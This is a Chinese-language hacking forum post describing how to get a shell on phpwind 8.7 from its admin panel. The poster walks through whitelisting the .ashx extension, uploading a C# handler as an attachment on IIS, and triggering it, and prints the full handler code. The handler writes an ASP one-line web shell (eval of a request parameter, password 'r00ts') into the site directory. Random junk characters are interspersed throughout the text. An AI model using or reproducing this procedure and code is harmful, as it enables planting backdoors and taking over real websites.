找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2627|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
: |+ F( N' _6 V) a2 Z
' E( I% m  T; u) ?/ T' g) @! ?" y群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx  x; q8 b. W+ q

7 U7 r& [- Z; D+ I6 `( J% q8 ?发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
; B* L- [  ]; L8 j1 p" c# H , H% t9 o# H" D0 I# U
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx7 F# z! Y  M$ l& O3 `4 u0 G* o" d
2 t/ A( S, V8 y
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
& G' x8 r7 J, l
, j2 [  i/ O9 [, j) X下面是代码:4 G3 r* v( d1 g9 Z6 m# c6 q

" U6 f; F: x' `3 E<%@ WebHandler Language="C#"Class="Handler" %>
9 @  E/ @2 u6 x" y- l) @using System;6 R8 P6 |5 ?% K3 N' ?
using System.Web;
  P0 ~, ~: V' x1 E% |8 Rusing System.IO;7 l. l  W4 x; K, ~- |. M) I# A
public class Handler : IHttpHandler {7 O  h  l! u) ~4 T; f
public void ProcessRequest (HttpContext context) {
( M3 s. ?8 X6 Q7 ~6 t) [; |$ Hcontext.Response.ContentType = "text/plain";5 Y* Q0 y3 J* T- l+ w
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
# r9 U) a& a' G& @* O& l: vfile1.Write("<%eval request(\"r00ts\")%>");$ R$ o* ?7 c4 H6 A! y% ?! A
file1.Flush();, y0 f! r+ q+ K* J# B+ m& K9 S
file1.Close();4 u# ~) g3 \) `8 l# c! t/ t7 n( v' T
}
; ?( H* I. L( [3 bpublic bool IsReusable {! J+ H0 n8 a# _& Y7 T
get {! L# h# s8 i0 U1 U, `
return false;0 p2 ]9 M$ J  R& V
}
9 n3 X" A: S( q$ F! b$ Z}
* I" H! u2 l4 i( j% G3 ^5 V}
0 F3 i" F, {: I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表